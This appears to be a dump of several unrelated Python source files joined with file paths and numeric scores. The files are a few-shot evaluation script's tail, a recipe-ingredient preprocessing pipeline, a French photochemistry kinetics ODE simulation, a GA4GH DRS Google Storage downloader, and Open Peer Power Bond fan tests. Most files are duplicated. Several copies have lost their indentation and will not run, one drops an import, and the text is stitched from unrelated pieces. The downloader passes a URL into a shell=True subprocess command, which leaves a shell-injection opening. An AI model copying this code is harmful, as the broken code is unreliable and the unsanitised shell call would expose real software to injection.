                selected_context = apply_selection(context_features, selection_params)
                selected_target = apply_selection(target_features, selection_params)
                _, stats_dict, _ = prototype_loss(
                    selected_context, context_labels,
                    selected_target, target_labels, distance=args['test.distance'])
                var_accs[dataset]['NCC'].append(stats_dict['acc'])
            dataset_acc = np.array(var_accs[dataset]['NCC']) * 100
            print(f"{dataset}: test_acc {dataset_acc.mean():.2f}%")
    # Print nice results table
    print('results of {}'.format(args['model.name']))
    rows = []
    for dataset_name in testsets:
        row = [dataset_name]
        for model_name in accs_names:
            acc = np.array(var_accs[dataset_name][model_name]) * 100
            mean_acc = acc.mean()
            # 95% confidence interval over the test episodes.
            conf = (1.96 * acc.std()) / np.sqrt(len(acc))
            row.append(f"{mean_acc:0.2f} +- {conf:0.2f}")
        rows.append(row)
    out_path = os.path.join(args['out.dir'], 'weights')
    out_path = check_dir(out_path, True)
    out_path = os.path.join(out_path, '{}-{}-{}-{}-test-results.npy'.format(args['model.name'], args['test.type'], 'pa', args['test.distance']))
    np.save(out_path, {'rows': rows})
    table = tabulate(rows, headers=['model \\ data'] + accs_names, floatfmt=".2f")
    print(table)
    print("\n")


if __name__ == '__main__':
    main()
import json
from nltk.tokenize import RegexpTokenizer
def read_raw_data(filename):
    """Load a JSON-lines file: one recipe object per line."""
    with open(filename, "r", encoding="utf8") as data_file:
        return [json.loads(line) for line in data_file]
def write_json_data(json_data, filename):
    """Write *json_data* to *filename* as 4-space-indented JSON."""
    with open(filename, "w", encoding="utf8") as data_outfile:
        data_outfile.write(json.dumps(json_data, indent=4))
def feature_selection(recipe_list):
    """Project raw recipe dicts onto the fields the app needs.

    Keeps the first parsed name per ingredient entry, drops entries with no
    usable name, and assigns sequential ids.
    """
    recipes_list_feature_selected = []
    for i, recipe in enumerate(recipe_list):
        ingredients = []
        for ingredient_detailed in recipe["ingredient"]:
            # Entries may lack the "ingredients" key, hold an empty list, or
            # be malformed; the original bare `except:` hid *every* error --
            # catch only the lookup failures we actually expect.
            try:
                ingredients.append(ingredient_detailed["ingredients"][0])
            except (KeyError, IndexError, TypeError):
                pass
        # Drop falsy names (the original appended "" and filtered here too).
        ingredients = list(filter(None, ingredients))
        recipes_list_feature_selected.append(
            {
                "id": i,
                "title": recipe["title"],
                "ingredients": ingredients,
                "instructions": recipe["instructions"],
                "url": recipe["url"],
                "photo": recipe["photo_url"],
            }
        )
    return recipes_list_feature_selected
def tokenization(recipe_list):
    """Normalize each recipe's ingredient list: lowercase, tokenize on word
    characters and join tokens with '-', deduplicating per recipe.

    Note: recipe_list is modified in place (recipe_list_tokenized is an
    alias of it) and also returned.
    """
    # BUG FIX: the original pattern r"\\w+" matches a literal backslash
    # followed by 'w', so tokenize() returned [] for every ingredient and
    # all names collapsed to "". r"\w+" matches runs of word characters,
    # which is clearly the intent. (Presumably an escaping artifact in the
    # original source -- confirm against upstream.)
    tokenizer = RegexpTokenizer(r"\w+")
    recipe_list_tokenized = recipe_list
    for recipe, recipe_tokenized in zip(recipe_list, recipe_list_tokenized):
        ingredient_list = list(set(recipe["ingredients"]))
        ingredient_list_tokenized = []
        for ingredient in ingredient_list:
            ingredient_tokenized = "-".join(
                tokenizer.tokenize(ingredient.lower()))
            ingredient_list_tokenized.append(ingredient_tokenized)
        ingredient_list_tokenized = list(set(ingredient_list_tokenized))
        recipe_tokenized["ingredients"] = ingredient_list_tokenized
    return recipe_list_tokenized
def load_into_corpus_list(recipe_list):
    """Build the ingredient corpus: unique ingredient strings across all
    recipes, sorted in reverse lexicographic order, with sequential ids."""
    corpus_set = set()
    for recipe in recipe_list:
        corpus_set.update(recipe["ingredients"])
    # enumerate replaces zip(range(len(...)), ...) and avoids shadowing the
    # builtin id() as the original loop variable did.
    return [
        {"id": index, "text": text}
        for index, text in enumerate(sorted(corpus_set, reverse=True))
    ]
def main():
    """Pipeline entry point: read raw scraped recipes, select fields,
    normalize ingredients, and write both the recipe data and the
    ingredient corpus as JSON."""
    recipe_list = read_raw_data("data/raw.json")
    recipe_list = feature_selection(recipe_list)
    recipe_list = tokenization(recipe_list)
    write_json_data(recipe_list, "data/data.json")
    corpus_list = load_into_corpus_list(recipe_list)
    write_json_data(corpus_list, "data/corpus.json")


if __name__ == "__main__":
    main()
from nltk.tokenize import RegexpTokenizer
def read_raw_data(filename):
    """Load a JSON-lines file: one recipe object per line."""
    with open(filename, "r", encoding="utf8") as data_file:
        return [json.loads(line) for line in data_file]
def write_json_data(json_data, filename):
    """Write *json_data* to *filename* as 4-space-indented JSON."""
    with open(filename, "w", encoding="utf8") as data_outfile:
        data_outfile.write(json.dumps(json_data, indent=4))
def feature_selection(recipe_list):
    """Project raw recipe dicts onto the fields the app needs.

    Keeps the first parsed name per ingredient entry, drops entries with no
    usable name, and assigns sequential ids.
    """
    recipes_list_feature_selected = []
    for i, recipe in enumerate(recipe_list):
        ingredients = []
        for ingredient_detailed in recipe["ingredient"]:
            # Entries may lack the "ingredients" key, hold an empty list, or
            # be malformed; the original bare `except:` hid *every* error --
            # catch only the lookup failures we actually expect.
            try:
                ingredients.append(ingredient_detailed["ingredients"][0])
            except (KeyError, IndexError, TypeError):
                pass
        # Drop falsy names (the original appended "" and filtered here too).
        ingredients = list(filter(None, ingredients))
        recipes_list_feature_selected.append(
            {
                "id": i,
                "title": recipe["title"],
                "ingredients": ingredients,
                "instructions": recipe["instructions"],
                "url": recipe["url"],
                "photo": recipe["photo_url"],
            }
        )
    return recipes_list_feature_selected
def tokenization(recipe_list):
    """Normalize each recipe's ingredient list: lowercase, tokenize on word
    characters and join tokens with '-', deduplicating per recipe.

    Note: recipe_list is modified in place (recipe_list_tokenized is an
    alias of it) and also returned.
    """
    # BUG FIX: the original pattern r"\\w+" matches a literal backslash
    # followed by 'w', so tokenize() returned [] for every ingredient and
    # all names collapsed to "". r"\w+" matches runs of word characters,
    # which is clearly the intent. (Presumably an escaping artifact in the
    # original source -- confirm against upstream.)
    tokenizer = RegexpTokenizer(r"\w+")
    recipe_list_tokenized = recipe_list
    for recipe, recipe_tokenized in zip(recipe_list, recipe_list_tokenized):
        ingredient_list = list(set(recipe["ingredients"]))
        ingredient_list_tokenized = []
        for ingredient in ingredient_list:
            ingredient_tokenized = "-".join(
                tokenizer.tokenize(ingredient.lower()))
            ingredient_list_tokenized.append(ingredient_tokenized)
        ingredient_list_tokenized = list(set(ingredient_list_tokenized))
        recipe_tokenized["ingredients"] = ingredient_list_tokenized
    return recipe_list_tokenized
def load_into_corpus_list(recipe_list):
    """Build the ingredient corpus: unique ingredient strings across all
    recipes, sorted in reverse lexicographic order, with sequential ids."""
    corpus_set = set()
    for recipe in recipe_list:
        corpus_set.update(recipe["ingredients"])
    # enumerate replaces zip(range(len(...)), ...) and avoids shadowing the
    # builtin id() as the original loop variable did.
    return [
        {"id": index, "text": text}
        for index, text in enumerate(sorted(corpus_set, reverse=True))
    ]
def main():
    """Pipeline entry point: read raw scraped recipes, select fields,
    normalize ingredients, and write both the recipe data and the
    ingredient corpus as JSON."""
    recipe_list = read_raw_data("data/raw.json")
    recipe_list = feature_selection(recipe_list)
    recipe_list = tokenization(recipe_list)
    write_json_data(recipe_list, "data/data.json")
    corpus_list = load_into_corpus_list(recipe_list)
    write_json_data(corpus_list, "data/corpus.json")


if __name__ == "__main__":
    main()
from scipy.integrate import odeint
import numpy
import matplotlib.pyplot as plt
# rate constants (forward k_i, reverse km_i)
k1 = 10**8
km1 = 10**2
k2 = 10**10
km2 = 10**2
k3 = 10**3
km3 = 10**16
k5 = 1.47*(10**6)
k6 = 1.4*(10**9)
k7 = 4.4*(10**9)
k8 = 10**7
# other constants
Iabs = 10**(-7) # variable (parameter varied between runs)
phi_T = 1
phi_C = 1
# definition of the studied system
def sys_cinetique(Z,t):
# espèces intervenant dans le système
Am = Z[0]
A = Z[1]
Pt = Z[2]
Ptm = Z[3]
Hp = Z[4]
H2 = Z[5]
PtH = Z[6]
S_etoile = Z[7]
Sp = Z[8]
S = Z[9]
D = Z[10]
# equadiff
dAmdt = k6*phi_C*S_etoile*A - k7*Sp*Am - k1*Am*Pt + km1*Ptm*A
dAdt = -k6*phi_C*S_etoile*A + k7*Sp*Am + k1*Am*Pt - km1*Ptm*A
dPtdt = -k1*Am*Pt + km1*Ptm*A + 2*k3*(PtH**2) - 2*km3*H2*(Pt**2)
dPtmdt = k1*Am*Pt - km1*Ptm*A - k2*Ptm*Hp + km2*PtH
dHpdt = km2*PtH - k2*Ptm*Hp
dH2dt = k3*(PtH**2) - km3*H2*(Pt**2)
dPtHdt = k2*Ptm*Hp - km2*PtH - 2*k3*(PtH**2) + 2*km3*H2*(Pt**2)
dS_etoiledt = Iabs*phi_T*S - k5*S_etoile - k6*phi_C*S_etoile*A
dSpdt = k6*phi_C*S_etoile*A - k7*Sp*Am - k8*Sp*D
dSdt = -Iabs*phi_T*S + k5*S_etoile + k7*Sp*Am + k8*Sp*D
dDdt = -k8*Sp*D
return [dAmdt, dAdt, dPtdt, dPtmdt, dHpdt, dH2dt, dPtHdt, dS_etoiledt, dSpdt, dSdt, dDdt]
# conditions initiales
Am0 = 0
A0 = 10**(-3) # varie
Pt0 = 10**(-5) # varie
Ptm0 = 0
Hp0 = 10**(-5)
H20 = 0
PtH0 = 0
S_etoile0 = 0
Sp0 = 0
S0 = 10**(-4)
D0 = 10**(-2)
Z0 = [Am0, A0, Pt0, Ptm0, Hp0, H20, PtH0, S_etoile0, Sp0, S0, D0]
# plage de temps calculée ( t_min, t_max, nb_de_points_calculés )
t = numpy.linspace(0, 2*10**8, 100000)
# équivalent à t = numpy.logspace(1, 8, num=100000) pour avoir directement en échelle log
# ODE
soln = odeint(sys_cinetique, Z0, t, rtol=1.49012*10**(-15), atol=1.49012*10**(-15), mxstep=5000000)
# graphes concentration en fonction du temps
plt.figure(1) # utile si on veut plusieurs figures
plt.subplot(221) # figure 1 est divisée en 4 graphes (2*2), ici le N°1
plt.plot(t,soln[:,0],color='blue', linestyle='solid', label='A-') # (axe_x, axe_y, ...)
plt.title('Evolution de [A-]')
#plt.legend() pas nécessaire ici car une seule courbe par graphe
#plt.xlabel("Temps en secondes")
plt.ylabel("Concentration en M")
plt.yscale('log') # linear par défaut, autre option : log
plt.xscale('log')
plt.subplot(222)
plt.plot(t,soln[:,5], color='red', linestyle='solid', label='H2')
plt.title('Evolution de [H2]')
#plt.legend()
#plt.xlabel("Temps en secondes")
#plt.ylabel("Concentration en M")
plt.yscale('log') # linear par défaut, autre option : log
plt.xscale('log')
plt.subplot(223)
plt.plot(t,soln[:,6],color='green', linestyle='solid', label='PtH')
plt.title('Evolution de [PtH]')
#plt.legend()
plt.xlabel("Temps en secondes")
plt.ylabel("Concentration en M")
plt.yscale('log') # linear par défaut, autre option : log
plt.xscale('log')
plt.subplot(224)
plt.plot(t,soln[:,2],color='brown', linestyle='solid', label='Pt')
plt.title('Evolution de [Pt]')
#plt.legend()
plt.xlabel("Temps en secondes")
#plt.ylabel("Concentration en M")
plt.yscale('log') # linear par défaut, autre option : log
plt.xscale('log')
plt.figure(2)
plt.plot(t,soln[:,0],color='blue', linestyle='solid', label='A-') # (axe_x, axe_y, ...)
plt.plot(t,soln[:,5], color='red', linestyle='solid', label='H2')
plt.plot(t,soln[:,6],color='green', linestyle='solid', label='PtH')
#plt.plot(t,soln[:,3],color='orange', linestyle='solid', label='Pt-')
plt.plot(t,soln[:,2],color='brown', linestyle='solid', label='Pt')
plt.title('Evolution du système')
plt.legend()
plt.xlabel("Temps en secondes")
plt.ylabel("Concentration en M")
plt.yscale('log') # linear par défaut, autre option : log
plt.xscale('log')
plt.show()
#plt.savefig('test.png') | Ebbesen.py | from scipy.integrate import odeint
import numpy
import matplotlib.pyplot as plt
# constantes de vitesse
k1 = 10**8
km1 = 10**2
k2 = 10**10
km2 = 10**2
k3 = 10**3
km3 = 10**16
k5 = 1.47*(10**6)
k6 = 1.4*(10**9)
k7 = 4.4*(10**9)
k8 = 10**7
# autres constantes
Iabs = 10**(-7) # variable
phi_T = 1
phi_C = 1
# définition du système étudié
def sys_cinetique(Z,t):
# espèces intervenant dans le système
Am = Z[0]
A = Z[1]
Pt = Z[2]
Ptm = Z[3]
Hp = Z[4]
H2 = Z[5]
PtH = Z[6]
S_etoile = Z[7]
Sp = Z[8]
S = Z[9]
D = Z[10]
# equadiff
dAmdt = k6*phi_C*S_etoile*A - k7*Sp*Am - k1*Am*Pt + km1*Ptm*A
dAdt = -k6*phi_C*S_etoile*A + k7*Sp*Am + k1*Am*Pt - km1*Ptm*A
dPtdt = -k1*Am*Pt + km1*Ptm*A + 2*k3*(PtH**2) - 2*km3*H2*(Pt**2)
dPtmdt = k1*Am*Pt - km1*Ptm*A - k2*Ptm*Hp + km2*PtH
dHpdt = km2*PtH - k2*Ptm*Hp
dH2dt = k3*(PtH**2) - km3*H2*(Pt**2)
dPtHdt = k2*Ptm*Hp - km2*PtH - 2*k3*(PtH**2) + 2*km3*H2*(Pt**2)
dS_etoiledt = Iabs*phi_T*S - k5*S_etoile - k6*phi_C*S_etoile*A
dSpdt = k6*phi_C*S_etoile*A - k7*Sp*Am - k8*Sp*D
dSdt = -Iabs*phi_T*S + k5*S_etoile + k7*Sp*Am + k8*Sp*D
dDdt = -k8*Sp*D
return [dAmdt, dAdt, dPtdt, dPtmdt, dHpdt, dH2dt, dPtHdt, dS_etoiledt, dSpdt, dSdt, dDdt]
# conditions initiales
Am0 = 0
A0 = 10**(-3) # varie
Pt0 = 10**(-5) # varie
Ptm0 = 0
Hp0 = 10**(-5)
H20 = 0
PtH0 = 0
S_etoile0 = 0
Sp0 = 0
S0 = 10**(-4)
D0 = 10**(-2)
Z0 = [Am0, A0, Pt0, Ptm0, Hp0, H20, PtH0, S_etoile0, Sp0, S0, D0]
# plage de temps calculée ( t_min, t_max, nb_de_points_calculés )
t = numpy.linspace(0, 2*10**8, 100000)
# équivalent à t = numpy.logspace(1, 8, num=100000) pour avoir directement en échelle log
# ODE
soln = odeint(sys_cinetique, Z0, t, rtol=1.49012*10**(-15), atol=1.49012*10**(-15), mxstep=5000000)
# graphes concentration en fonction du temps
plt.figure(1) # utile si on veut plusieurs figures
plt.subplot(221) # figure 1 est divisée en 4 graphes (2*2), ici le N°1
plt.plot(t,soln[:,0],color='blue', linestyle='solid', label='A-') # (axe_x, axe_y, ...)
plt.title('Evolution de [A-]')
#plt.legend() pas nécessaire ici car une seule courbe par graphe
#plt.xlabel("Temps en secondes")
plt.ylabel("Concentration en M")
plt.yscale('log') # linear par défaut, autre option : log
plt.xscale('log')
plt.subplot(222)
plt.plot(t,soln[:,5], color='red', linestyle='solid', label='H2')
plt.title('Evolution de [H2]')
#plt.legend()
#plt.xlabel("Temps en secondes")
#plt.ylabel("Concentration en M")
plt.yscale('log') # linear par défaut, autre option : log
plt.xscale('log')
plt.subplot(223)
plt.plot(t,soln[:,6],color='green', linestyle='solid', label='PtH')
plt.title('Evolution de [PtH]')
#plt.legend()
plt.xlabel("Temps en secondes")
plt.ylabel("Concentration en M")
plt.yscale('log') # linear par défaut, autre option : log
plt.xscale('log')
plt.subplot(224)
plt.plot(t,soln[:,2],color='brown', linestyle='solid', label='Pt')
plt.title('Evolution de [Pt]')
#plt.legend()
plt.xlabel("Temps en secondes")
#plt.ylabel("Concentration en M")
plt.yscale('log') # linear par défaut, autre option : log
plt.xscale('log')
plt.figure(2)
plt.plot(t,soln[:,0],color='blue', linestyle='solid', label='A-') # (axe_x, axe_y, ...)
plt.plot(t,soln[:,5], color='red', linestyle='solid', label='H2')
plt.plot(t,soln[:,6],color='green', linestyle='solid', label='PtH')
#plt.plot(t,soln[:,3],color='orange', linestyle='solid', label='Pt-')
plt.plot(t,soln[:,2],color='brown', linestyle='solid', label='Pt')
plt.title('Evolution du système')
plt.legend()
plt.xlabel("Temps en secondes")
plt.ylabel("Concentration en M")
plt.yscale('log') # linear par défaut, autre option : log
plt.xscale('log')
plt.show()
#plt.savefig('test.png') | 0.376852 | 0.485295 |
import os
import re
import requests
import subprocess
from ga4gh.drs.exceptions.drs_exceptions import DownloadSubmethodException
from ga4gh.drs.util.method_types.method_type import DownloadSubmethod
from ga4gh.drs.util.method_types.method_type import MethodType
class GS(MethodType):
"""Download DRS object bytes according to Google Storage (gs) url scheme
Attributes:
download_submethods (list): multiple methods to attempt byte download
"""
def __init__(self, json, drs_obj):
"""Instantiates a GS object
Arguments:
json (dict): parsed AccessMethod JSON, used to set other attributes
drs_obj (DRSObject): reference to parent DRSObject object
"""
super(GS, self).__init__(json, drs_obj)
self.download_submethods = [
self.__download_by_https,
self.__download_by_gsutil
]
def __convert_gs_to_https(self):
"""Convert a gs formatted URL to https
Returns:
(str): https-formatted url, references a Google Storage object
"""
gs_url = self.access_url.get_url()
sub_from = "^gs://"
sub_to = "https://storage.googleapis.com/"
new_url = re.sub(sub_from, sub_to, gs_url)
return new_url
@DownloadSubmethod()
def __download_by_https(self, write_config):
"""Download submethod, get object bytes by https
Arguments:
write_config (dict): config to write downloaded file
"""
# convert the gs url to https, and attempt to download it via
# GET request
https_url = self.__convert_gs_to_https()
self._MethodType__download_by_requests_package(https_url, write_config)
@DownloadSubmethod()
def __download_by_gsutil(self, write_config):
"""Download submethod, get object bytes by gsutil cli tool
Arguments:
write_config (dict): config to write downloaded file
"""
def iterator_func(chunk_size=8192):
"""Iterator function for chunked writing of output file
Arguments:
chunk_size (int): download chunk size in bytes
"""
# create a subprocess based on gsutil command-line tool
# as stdout is output is chunks, yield this to outer loop
# poll for status at end of stdout stream, set status
# according to exit code
url = self.access_url.get_url()
cmd = "gsutil cp " + url + " -"
task = subprocess.Popen(cmd, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
file_not_complete = True
while file_not_complete:
chunk = task.stdout.read(chunk_size)
if chunk:
yield chunk
else:
file_not_complete = False
task.poll()
if task.returncode != 0:
raise DownloadSubmethodException(
write_config["opath"] + ": exception when downloading "
+ "by gsutil: " + str(task.stderr.read()))
self.download_write_stream(iterator_func, write_config) | ga4gh/drs/util/method_types/gs.py | import os
import re
import requests
import subprocess
from ga4gh.drs.exceptions.drs_exceptions import DownloadSubmethodException
from ga4gh.drs.util.method_types.method_type import DownloadSubmethod
from ga4gh.drs.util.method_types.method_type import MethodType
class GS(MethodType):
"""Download DRS object bytes according to Google Storage (gs) url scheme
Attributes:
download_submethods (list): multiple methods to attempt byte download
"""
def __init__(self, json, drs_obj):
"""Instantiates a GS object
Arguments:
json (dict): parsed AccessMethod JSON, used to set other attributes
drs_obj (DRSObject): reference to parent DRSObject object
"""
super(GS, self).__init__(json, drs_obj)
self.download_submethods = [
self.__download_by_https,
self.__download_by_gsutil
]
def __convert_gs_to_https(self):
"""Convert a gs formatted URL to https
Returns:
(str): https-formatted url, references a Google Storage object
"""
gs_url = self.access_url.get_url()
sub_from = "^gs://"
sub_to = "https://storage.googleapis.com/"
new_url = re.sub(sub_from, sub_to, gs_url)
return new_url
@DownloadSubmethod()
def __download_by_https(self, write_config):
"""Download submethod, get object bytes by https
Arguments:
write_config (dict): config to write downloaded file
"""
# convert the gs url to https, and attempt to download it via
# GET request
https_url = self.__convert_gs_to_https()
self._MethodType__download_by_requests_package(https_url, write_config)
@DownloadSubmethod()
def __download_by_gsutil(self, write_config):
"""Download submethod, get object bytes by gsutil cli tool
Arguments:
write_config (dict): config to write downloaded file
"""
def iterator_func(chunk_size=8192):
"""Iterator function for chunked writing of output file
Arguments:
chunk_size (int): download chunk size in bytes
"""
# create a subprocess based on gsutil command-line tool
# as stdout is output is chunks, yield this to outer loop
# poll for status at end of stdout stream, set status
# according to exit code
url = self.access_url.get_url()
cmd = "gsutil cp " + url + " -"
task = subprocess.Popen(cmd, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
file_not_complete = True
while file_not_complete:
chunk = task.stdout.read(chunk_size)
if chunk:
yield chunk
else:
file_not_complete = False
task.poll()
if task.returncode != 0:
raise DownloadSubmethodException(
write_config["opath"] + ": exception when downloading "
+ "by gsutil: " + str(task.stderr.read()))
self.download_write_stream(iterator_func, write_config) | 0.635109 | 0.244397 |
import asyncio
from datetime import timedelta
from unittest.mock import patch
from bond_api import BPUPSubscriptions, DeviceType
from openpeerpower import core
from openpeerpower.components import fan
from openpeerpower.components.fan import DOMAIN as FAN_DOMAIN
from openpeerpower.const import EVENT_OPENPEERPOWER_STOP, STATE_ON, STATE_UNAVAILABLE
from openpeerpower.core import CoreState
from openpeerpower.util import utcnow
from .common import patch_bond_device_state, setup_platform
from tests.common import async_fire_time_changed
def ceiling_fan(name: str):
"""Create a ceiling fan with given name."""
return {
"name": name,
"type": DeviceType.CEILING_FAN,
"actions": ["SetSpeed", "SetDirection"],
}
async def test_bpup_goes_offline_and_recovers_same_entity(opp: core.OpenPeerPower):
"""Test that push updates fail and we fallback to polling and then bpup recovers.
The BPUP recovery is triggered by an update for the entity and
we do not fallback to polling because state is in sync.
"""
bpup_subs = BPUPSubscriptions()
with patch(
"openpeerpower.components.bond.BPUPSubscriptions",
return_value=bpup_subs,
):
await setup_platform(
opp, FAN_DOMAIN, ceiling_fan("name-1"), bond_device_id="test-device-id"
)
bpup_subs.notify(
{
"s": 200,
"t": "bond/test-device-id/update",
"b": {"power": 1, "speed": 3, "direction": 0},
}
)
await opp.async_block_till_done()
assert opp.states.get("fan.name_1").attributes[fan.ATTR_PERCENTAGE] == 100
bpup_subs.notify(
{
"s": 200,
"t": "bond/test-device-id/update",
"b": {"power": 1, "speed": 1, "direction": 0},
}
)
await opp.async_block_till_done()
assert opp.states.get("fan.name_1").attributes[fan.ATTR_PERCENTAGE] == 33
bpup_subs.last_message_time = 0
with patch_bond_device_state(side_effect=asyncio.TimeoutError):
async_fire_time_changed(opp, utcnow() + timedelta(seconds=230))
await opp.async_block_till_done()
assert opp.states.get("fan.name_1").state == STATE_UNAVAILABLE
# Ensure we do not poll to get the state
# since bpup has recovered and we know we
# are back in sync
with patch_bond_device_state(side_effect=Exception):
bpup_subs.notify(
{
"s": 200,
"t": "bond/test-device-id/update",
"b": {"power": 1, "speed": 2, "direction": 0},
}
)
await opp.async_block_till_done()
state = opp.states.get("fan.name_1")
assert state.state == STATE_ON
assert state.attributes[fan.ATTR_PERCENTAGE] == 66
async def test_bpup_goes_offline_and_recovers_different_entity(
opp: core.OpenPeerPower,
):
"""Test that push updates fail and we fallback to polling and then bpup recovers.
The BPUP recovery is triggered by an update for a different entity which
forces a poll since we need to re-get the state.
"""
bpup_subs = BPUPSubscriptions()
with patch(
"openpeerpower.components.bond.BPUPSubscriptions",
return_value=bpup_subs,
):
await setup_platform(
opp, FAN_DOMAIN, ceiling_fan("name-1"), bond_device_id="test-device-id"
)
bpup_subs.notify(
{
"s": 200,
"t": "bond/test-device-id/update",
"b": {"power": 1, "speed": 3, "direction": 0},
}
)
await opp.async_block_till_done()
assert opp.states.get("fan.name_1").attributes[fan.ATTR_PERCENTAGE] == 100
bpup_subs.notify(
{
"s": 200,
"t": "bond/test-device-id/update",
"b": {"power": 1, "speed": 1, "direction": 0},
}
)
await opp.async_block_till_done()
assert opp.states.get("fan.name_1").attributes[fan.ATTR_PERCENTAGE] == 33
bpup_subs.last_message_time = 0
with patch_bond_device_state(side_effect=asyncio.TimeoutError):
async_fire_time_changed(opp, utcnow() + timedelta(seconds=230))
await opp.async_block_till_done()
assert opp.states.get("fan.name_1").state == STATE_UNAVAILABLE
bpup_subs.notify(
{
"s": 200,
"t": "bond/not-this-device-id/update",
"b": {"power": 1, "speed": 2, "direction": 0},
}
)
await opp.async_block_till_done()
assert opp.states.get("fan.name_1").state == STATE_UNAVAILABLE
with patch_bond_device_state(return_value={"power": 1, "speed": 1}):
async_fire_time_changed(opp, utcnow() + timedelta(seconds=430))
await opp.async_block_till_done()
state = opp.states.get("fan.name_1")
assert state.state == STATE_ON
assert state.attributes[fan.ATTR_PERCENTAGE] == 33
async def test_polling_fails_and_recovers(opp: core.OpenPeerPower):
"""Test that polling fails and we recover."""
await setup_platform(
opp, FAN_DOMAIN, ceiling_fan("name-1"), bond_device_id="test-device-id"
)
with patch_bond_device_state(side_effect=asyncio.TimeoutError):
async_fire_time_changed(opp, utcnow() + timedelta(seconds=230))
await opp.async_block_till_done()
assert opp.states.get("fan.name_1").state == STATE_UNAVAILABLE
with patch_bond_device_state(return_value={"power": 1, "speed": 1}):
async_fire_time_changed(opp, utcnow() + timedelta(seconds=230))
await opp.async_block_till_done()
state = opp.states.get("fan.name_1")
assert state.state == STATE_ON
assert state.attributes[fan.ATTR_PERCENTAGE] == 33
async def test_polling_stops_at_the_stop_event(opp: core.OpenPeerPower):
"""Test that polling stops at the stop event."""
await setup_platform(
opp, FAN_DOMAIN, ceiling_fan("name-1"), bond_device_id="test-device-id"
)
with patch_bond_device_state(side_effect=asyncio.TimeoutError):
async_fire_time_changed(opp, utcnow() + timedelta(seconds=230))
await opp.async_block_till_done()
assert opp.states.get("fan.name_1").state == STATE_UNAVAILABLE
opp.bus.async_fire(EVENT_OPENPEERPOWER_STOP)
opp.state = CoreState.stopping
await opp.async_block_till_done()
with patch_bond_device_state(return_value={"power": 1, "speed": 1}):
async_fire_time_changed(opp, utcnow() + timedelta(seconds=230))
await opp.async_block_till_done()
assert opp.states.get("fan.name_1").state == STATE_UNAVAILABLE | tests/components/bond/test_entity.py | import asyncio
from datetime import timedelta
from unittest.mock import patch
from bond_api import BPUPSubscriptions, DeviceType
from openpeerpower import core
from openpeerpower.components import fan
from openpeerpower.components.fan import DOMAIN as FAN_DOMAIN
from openpeerpower.const import EVENT_OPENPEERPOWER_STOP, STATE_ON, STATE_UNAVAILABLE
from openpeerpower.core import CoreState
from openpeerpower.util import utcnow
from .common import patch_bond_device_state, setup_platform
from tests.common import async_fire_time_changed
def ceiling_fan(name: str):
"""Create a ceiling fan with given name."""
return {
"name": name,
"type": DeviceType.CEILING_FAN,
"actions": ["SetSpeed", "SetDirection"],
}
async def test_bpup_goes_offline_and_recovers_same_entity(opp: core.OpenPeerPower):
"""Test that push updates fail and we fallback to polling and then bpup recovers.
The BPUP recovery is triggered by an update for the entity and
we do not fallback to polling because state is in sync.
"""
bpup_subs = BPUPSubscriptions()
with patch(
"openpeerpower.components.bond.BPUPSubscriptions",
return_value=bpup_subs,
):
await setup_platform(
opp, FAN_DOMAIN, ceiling_fan("name-1"), bond_device_id="test-device-id"
)
bpup_subs.notify(
{
"s": 200,
"t": "bond/test-device-id/update",
"b": {"power": 1, "speed": 3, "direction": 0},
}
)
await opp.async_block_till_done()
assert opp.states.get("fan.name_1").attributes[fan.ATTR_PERCENTAGE] == 100
bpup_subs.notify(
{
"s": 200,
"t": "bond/test-device-id/update",
"b": {"power": 1, "speed": 1, "direction": 0},
}
)
await opp.async_block_till_done()
assert opp.states.get("fan.name_1").attributes[fan.ATTR_PERCENTAGE] == 33
bpup_subs.last_message_time = 0
with patch_bond_device_state(side_effect=asyncio.TimeoutError):
async_fire_time_changed(opp, utcnow() + timedelta(seconds=230))
await opp.async_block_till_done()
assert opp.states.get("fan.name_1").state == STATE_UNAVAILABLE
# Ensure we do not poll to get the state
# since bpup has recovered and we know we
# are back in sync
with patch_bond_device_state(side_effect=Exception):
bpup_subs.notify(
{
"s": 200,
"t": "bond/test-device-id/update",
"b": {"power": 1, "speed": 2, "direction": 0},
}
)
await opp.async_block_till_done()
state = opp.states.get("fan.name_1")
assert state.state == STATE_ON
assert state.attributes[fan.ATTR_PERCENTAGE] == 66
async def test_bpup_goes_offline_and_recovers_different_entity(
opp: core.OpenPeerPower,
):
"""Test that push updates fail and we fallback to polling and then bpup recovers.
The BPUP recovery is triggered by an update for a different entity which
forces a poll since we need to re-get the state.
"""
bpup_subs = BPUPSubscriptions()
with patch(
"openpeerpower.components.bond.BPUPSubscriptions",
return_value=bpup_subs,
):
await setup_platform(
opp, FAN_DOMAIN, ceiling_fan("name-1"), bond_device_id="test-device-id"
)
bpup_subs.notify(
{
"s": 200,
"t": "bond/test-device-id/update",
"b": {"power": 1, "speed": 3, "direction": 0},
}
)
await opp.async_block_till_done()
assert opp.states.get("fan.name_1").attributes[fan.ATTR_PERCENTAGE] == 100
bpup_subs.notify(
{
"s": 200,
"t": "bond/test-device-id/update",
"b": {"power": 1, "speed": 1, "direction": 0},
}
)
await opp.async_block_till_done()
assert opp.states.get("fan.name_1").attributes[fan.ATTR_PERCENTAGE] == 33
bpup_subs.last_message_time = 0
with patch_bond_device_state(side_effect=asyncio.TimeoutError):
async_fire_time_changed(opp, utcnow() + timedelta(seconds=230))
await opp.async_block_till_done()
assert opp.states.get("fan.name_1").state == STATE_UNAVAILABLE
bpup_subs.notify(
{
"s": 200,
"t": "bond/not-this-device-id/update",
"b": {"power": 1, "speed": 2, "direction": 0},
}
)
await opp.async_block_till_done()
assert opp.states.get("fan.name_1").state == STATE_UNAVAILABLE
with patch_bond_device_state(return_value={"power": 1, "speed": 1}):
async_fire_time_changed(opp, utcnow() + timedelta(seconds=430))
await opp.async_block_till_done()
state = opp.states.get("fan.name_1")
assert state.state == STATE_ON
assert state.attributes[fan.ATTR_PERCENTAGE] == 33
async def test_polling_fails_and_recovers(opp: core.OpenPeerPower):
"""Test that polling fails and we recover."""
await setup_platform(
opp, FAN_DOMAIN, ceiling_fan("name-1"), bond_device_id="test-device-id"
)
with patch_bond_device_state(side_effect=asyncio.TimeoutError):
async_fire_time_changed(opp, utcnow() + timedelta(seconds=230))
await opp.async_block_till_done()
assert opp.states.get("fan.name_1").state == STATE_UNAVAILABLE
with patch_bond_device_state(return_value={"power": 1, "speed": 1}):
async_fire_time_changed(opp, utcnow() + timedelta(seconds=230))
await opp.async_block_till_done()
state = opp.states.get("fan.name_1")
assert state.state == STATE_ON
